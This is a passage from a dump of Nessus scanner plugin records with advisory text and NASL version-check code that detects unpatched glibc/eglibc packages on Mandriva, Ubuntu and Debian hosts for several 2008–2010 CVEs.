flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-profile-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-static-devel-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-utils-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"nscd-2.9-0.20081113.5.1mnb2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:57:31", "description": "Maksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon function. If a user\nor automated system were tricked into processing a specially crafted\nformat string, a remote attacker could crash applications, leading to\na denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If a\nlocal attacker were able to inject newlines into a mount entry through\nother vulnerable mount helpers, they could disrupt the system or\npossibly gain root privileges. (CVE-2010-0296)\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a remote\nattacker could execute arbitrary code with user privileges.\n(CVE-2010-0830).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2010-05-26T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : glibc, eglibc vulnerabilities (USN-944-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libc-bin", "p-cpe:/a:canonical:ubuntu_linux:nscd", "p-cpe:/a:canonical:ubuntu_linux:libc6-dbg", "p-cpe:/a:canonical:ubuntu_linux:libc6-pic", "p-cpe:/a:canonical:ubuntu_linux:libc6-i686", "p-cpe:/a:canonical:ubuntu_linux:libc6", "p-cpe:/a:canonical:ubuntu_linux:libc6-dev-i386", "p-cpe:/a:canonical:ubuntu_linux:libc6-prof", "p-cpe:/a:canonical:ubuntu_linux:libc6-dev", "p-cpe:/a:canonical:ubuntu_linux:glibc-source", "p-cpe:/a:canonical:ubuntu_linux:libc6-sparcv9b", "p-cpe:/a:canonical:ubuntu_linux:libc-dev-bin", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libc6-sparcv9v", "p-cpe:/a:canonical:ubuntu_linux:eglibc-source", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:glibc-doc", "p-cpe:/a:canonical:ubuntu_linux:libc6-i386", "p-cpe:/a:canonical:ubuntu_linux:libc6-xen", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:libc6-amd64", "p-cpe:/a:canonical:ubuntu_linux:libc6-dev-amd64", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-944-1.NASL", "href": "https://www.tenable.com/plugins/nessus/46731", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-944-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46731);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_bugtraq_id(36443, 40063);\n script_xref(name:\"USN\", value:\"944-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : glibc, eglibc vulnerabilities (USN-944-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Maksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon function. If a user\nor automated system were tricked into processing a specially crafted\nformat string, a remote attacker could crash applications, leading to\na denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If a\nlocal attacker were able to inject newlines into a mount entry through\nother vulnerable mount helpers, they could disrupt the system or\npossibly gain root privileges. (CVE-2010-0296)\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a remote\nattacker could execute arbitrary code with user privileges.\n(CVE-2010-0830).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/944-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:glibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-sparcv9b\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-sparcv9v\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|9\\.04|9\\.10|10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.04 / 9.10 / 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"glibc-doc\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-amd64\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-dbg\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-dev\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-dev-amd64\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-dev-i386\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-i386\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-i686\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-pic\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-prof\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-sparcv9b\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libc6-sparcv9v\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"nscd\", pkgver:\"2.3.6-0ubuntu20.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"glibc-doc\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"glibc-source\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-amd64\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-dbg\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-dev\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-dev-amd64\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-dev-i386\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-i386\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-i686\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-pic\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-prof\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libc6-xen\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"nscd\", pkgver:\"2.7-10ubuntu6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"glibc-doc\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"glibc-source\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-amd64\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-dbg\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-dev\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-dev-amd64\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-dev-i386\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-i386\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-i686\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-pic\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-prof\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libc6-xen\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"nscd\", pkgver:\"2.9-4ubuntu6.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"eglibc-source\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"glibc-doc\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc-bin\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc-dev-bin\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-amd64\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-dbg\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-dev\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-dev-amd64\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-dev-i386\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-i386\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-i686\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-pic\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-prof\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libc6-xen\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"nscd\", pkgver:\"2.10.1-0ubuntu17\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"eglibc-source\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"glibc-doc\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc-bin\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc-dev-bin\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-amd64\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-dbg\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-dev\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-dev-amd64\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-dev-i386\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-i386\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-i686\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-pic\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-prof\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6-xen\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"nscd\", pkgver:\"2.11.1-0ubuntu7.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eglibc-source / glibc-doc / glibc-source / libc-bin / libc-dev-bin / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:46:00", "description": "Several vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n Maksymilian Arciemowicz discovered that the GNU C\n library did not correctly handle integer overflows in\n the strfmon family of functions. If a user or automated\n system were tricked into processing a specially crafted\n format string, a remote attacker could crash\n applications, leading to a denial of service.\n\n - CVE-2010-0296\n Jeff Layton and Dan Rosenberg discovered that the GNU C\n library did not correctly handle newlines in the mntent\n family of functions. If a local attacker were able to\n inject newlines into a mount entry through other\n vulnerable mount helpers, they could disrupt the system\n or possibly gain root privileges.\n\n - CVE-2010-0830\n Dan Rosenberg discovered that the GNU C library did not\n correctly validate certain ELF program headers. If a\n user or automated system were tricked into verifying a\n specially crafted ELF program, a remote attacker could\n execute arbitrary code with user privileges.", "edition": 26, "published": "2010-06-11T00:00:00", "title": "Debian DSA-2058-1 : glibc, eglibc - multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2010-06-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:glibc"], "id": "DEBIAN_DSA-2058.NASL", "href": "https://www.tenable.com/plugins/nessus/46861", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2058. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46861);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_bugtraq_id(36443, 40063);\n script_xref(name:\"DSA\", value:\"2058\");\n\n script_name(english:\"Debian DSA-2058-1 : glibc, eglibc - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n Maksymilian Arciemowicz discovered that the GNU C\n library did not correctly handle integer overflows in\n the strfmon family of functions. If a user or automated\n system were tricked into processing a specially crafted\n format string, a remote attacker could crash\n applications, leading to a denial of service.\n\n - CVE-2010-0296\n Jeff Layton and Dan Rosenberg discovered that the GNU C\n library did not correctly handle newlines in the mntent\n family of functions. If a local attacker were able to\n inject newlines into a mount entry through other\n vulnerable mount helpers, they could disrupt the system\n or possibly gain root privileges.\n\n - CVE-2010-0830\n Dan Rosenberg discovered that the GNU C library did not\n correctly validate certain ELF program headers. If a\n user or automated system were tricked into verifying a\n specially crafted ELF program, a remote attacker could\n execute arbitrary code with user privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2058\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the glibc or eglibc packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.7-18lenny4 of the glibc package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"glibc-doc\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"glibc-source\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-amd64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dbg\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-amd64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-i386\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-mips64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-mipsn32\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-ppc64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-s390x\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-dev-sparc64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-i386\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-i686\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-mips64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-mipsn32\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-pic\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-ppc64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-prof\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-s390x\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-sparc64\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-sparcv9b\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6-xen\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1-alphaev67\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1-dbg\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1-dev\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1-pic\", 